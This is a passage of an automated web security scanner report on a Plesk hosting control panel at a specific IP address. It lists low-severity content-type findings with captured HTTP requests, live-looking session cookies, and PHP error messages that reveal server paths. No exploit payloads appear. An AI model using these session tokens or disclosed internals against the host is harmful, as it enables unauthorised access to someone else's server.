Last-Modified: Sun, 10 Oct 2010 02:21:59 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:21:59 GMT
Connection: close
Content-Length: 965


       <html><head><title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20100707.19"/></script>
       <script language="javascript" typ
...[SNIP]...

10.2. http://174.122.23.218:8880/javascript/chk.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /javascript/chk.js.php

Request

GET /javascript/chk.js.php? HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=domains

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "1286676477-10321169792bce25daa15603ea9ba645-en-US"
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:56 GMT
Connection: close
Content-Length: 8896

function chk_quotes(str)
{
   re = /(\'.*\")|(\".*\')/;
   return str.search(re) == -1;
}


function chk_pd_name(dir)
{
   re = /^[0-9a-zA-Z\-_.\/~@!\+=\^\(\)\[\]\{\}, ]+$/;
   // forbid // and ^. a
...[SNIP]...

10.3. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/

Request

GET /plesk/client@1/domain@1/hosting/file-manager/ HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:32:16 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:32:15 GMT
Connection: close
Content-Length: 965


       <html><head><title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20100707.19"/></script>
       <script language="javascript" typ
...[SNIP]...

10.4. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/edit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/edit/

Request

GET /plesk/client@1/domain@1/hosting/file-manager/edit/?cmd=chdir&file=%2F HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/edit/
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:12:16 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:13:49 GMT
Connection: close
Content-Length: 965


       <html><head><title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20100707.19"/></script>
       <script language="javascript" typ
...[SNIP]...

10.5. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/permissions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/permissions/

Request

GET /plesk/client@1/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fplesk.cloudscan.me%2Ferror_docs%2Funauthorized.html HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Ferror_docs%2F
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; testCookie=test; psaContext=dashboard; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:08:35 GMT
Connection: close
Content-Length: 433

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<html><head><title>Plesk encountered
...[SNIP]...

10.6. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/rename/

Request

GET /plesk/client@1/domain@1/hosting/file-manager/rename/?cmd=chdir&file=%2Fhttpdocs%2Fcss%2F HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/?cmd=rename_dir&file=img
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:12:43 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:14:17 GMT
Connection: close
Content-Length: 965


       <html><head><title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20100707.19"/></script>
       <script language="javascript" typ
...[SNIP]...

10.7. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/view/

Request

GET /plesk/client@1/domain@1/hosting/file-manager/view/?cmd=show&file=request-uri_too_long.html HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Ferror_docs%2F
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; psaContext=dashboard; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:08:35 GMT
Connection: close
Content-Length: 126070

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...

10.8. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/function.require  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/view/function.require

Request

POST /plesk/client@1/domain@1/hosting/file-manager/view/function.require HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/function.require
Cookie: PLESKSESSID=9d849cf17c2d47b0f3a3632f74ebeeaf; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;
Content-Type: multipart/form-data; boundary=--------1390412739
Content-Length: 821

----------1390412739
Content-Disposition: form-data; name="cmd"

update
----------1390412739
Content-Disposition: form-data; name="previous_page"


----------1390412739
Content-Disposition: f
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:14:17 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:14:16 GMT
Connection: close
Content-Length: 965


       <html><head><title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20100707.19"/></script>
       <script language="javascript" typ
...[SNIP]...

10.9. http://174.122.23.218:8880/smb/admin-home/application-items/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/admin-home/application-items/

Request

GET /smb/admin-home/application-items/ HTTP/1.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us
x-prototype-version: 1.6.1_rc3
Referer: http://174.122.23.218:8880/smb/admin-home
x-requested-with: XMLHttpRequest
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=true; user=54a8ad2443247fe6e4900290dc4e0cf8; PHPSESSID=10321169792bce25daa15603ea9ba645

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:04:50 GMT
Connection: close
Content-Length: 5386

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.ListContainer({
renderTo: 'applicationItems-content-area',
items: [

...[SNIP]...

10.10. http://174.122.23.218:8880/smb/app/search-data/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/app/search-data/

Request

GET /smb/app/search-data/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:23 GMT
Connection: close
Content-Length: 28409

<div class="aps-marketplace"><ul class="aps-marketplace-list"><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">

...[SNIP]...

10.11. http://174.122.23.218:8880/smb/app/search-data/catalogId/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/app/search-data/catalogId/

Request

GET /smb/app/search-data/catalogId/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:23 GMT
Connection: close
Content-Length: 28409

<div class="aps-marketplace"><ul class="aps-marketplace-list"><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">

...[SNIP]...

10.12. http://174.122.23.218:8880/smb/app/search-data/catalogId/marketplace  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/app/search-data/catalogId/marketplace

Request

GET /smb/app/search-data/catalogId/marketplace?name=&vendor=&packager=&cert=any HTTP/1.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us
x-prototype-version: 1.6.1_rc3
Referer: http://174.122.23.218:8880/smb/app/market/id/marketplace
x-requested-with: XMLHttpRequest
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:06:40 GMT
Connection: close
Content-Length: 28409

<div class="aps-marketplace"><ul class="aps-marketplace-list"><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">

...[SNIP]...

10.13. http://174.122.23.218:8880/smb/app/top-categories-data/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/app/top-categories-data/

Request

GET /smb/app/top-categories-data/ HTTP/1.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us
x-prototype-version: 1.6.1_rc3
Referer: http://174.122.23.218:8880/smb/admin-home
x-requested-with: XMLHttpRequest
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=true; user=54a8ad2443247fe6e4900290dc4e0cf8; PHPSESSID=10321169792bce25daa15603ea9ba645

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:04:50 GMT
Connection: close
Content-Length: 1096

<ul class="aps-category-list">
<li class="web-content-management"><a href="/smb/app/available/id/apscatalog/?category=Web%2FContent+management">Content management</a></li><li class="web-blog"><a href
...[SNIP]...

10.14. http://174.122.23.218:8880/smb/file/index/type/external/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file/index/type/external/

Request

GET /smb/file/index/type/external/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 03:12:15 GMT
Connection: close
Content-Length: 610

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant APPLI
...[SNIP]...

10.15. http://174.122.23.218:8880/smb/file/upload/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file/upload/

Request

GET /smb/file/upload/?init=true HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/smb/file/index/type/private/folder/admin
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: show-getting-started-popup=false; do-not-show-getting-started-popup=true; show-getting-started-popup=true; user=187d997e8ea6a5d0f56792f7f9ba70a4; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 03:11:36 GMT
Connection: close
Content-Length: 45

{"status":"SUCCESS","message":"","data":null}

10.16. http://174.122.23.218:8880/smb/web/statistics/id/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/web/statistics/id/1/

Request

GET /smb/web/statistics/id/1/ HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:08:10 GMT
Connection: close
Content-Length: 610

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant APPLI
...[SNIP]...

11. Content type incorrectly stated  previous
There are 6 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


11.1. http://174.122.23.218:8880/javascript/chk.js.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /javascript/chk.js.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/chk.js.php? HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=domains

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "1286676477-10321169792bce25daa15603ea9ba645-en-US"
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:56 GMT
Connection: close
Content-Length: 8896

function chk_quotes(str)
{
   re = /(\'.*\")|(\".*\')/;
   return str.search(re) == -1;
}


function chk_pd_name(dir)
{
   re = /^[0-9a-zA-Z\-_.\/~@!\+=\^\(\)\[\]\{\}, ]+$/;
   // forbid // and ^. a
...[SNIP]...

11.2. http://174.122.23.218:8880/plesk/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /plesk/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /plesk/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; psaContext=dashboard; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:06:59 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:06:59 GMT
Connection: close
Content-Length: 188

<br />
<b>Fatal error</b>: Call to a member function isSelf() on a non-object in <b>C:\Program Files (x86)\Parallels\Plesk\admin\plib\dashboard\Dashboard.php</b> on line <b>136</b><br />

11.3. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/rename/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /plesk/client@1/domain@1/hosting/file-manager/rename/?cmd=rename_dir&file=incoming HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fanon_ftp%2F
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; testCookie=test; psaContext=dashboard; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:08:36 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:08:35 GMT
Connection: close
Content-Length: 174

<br />
<b>Fatal error</b>: Call to undefined method UIPointer::() in <b>C:\Program Files (x86)\Parallels\Plesk\admin\plib\ui\client.domain.php</b> on line <b>3893</b><br />

11.4. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/view/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /plesk/client@1/domain@1/hosting/file-manager/view/?cmd=show&file=unauthorized.html HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Ferror_docs%2F
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; psaContext=dashboard; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
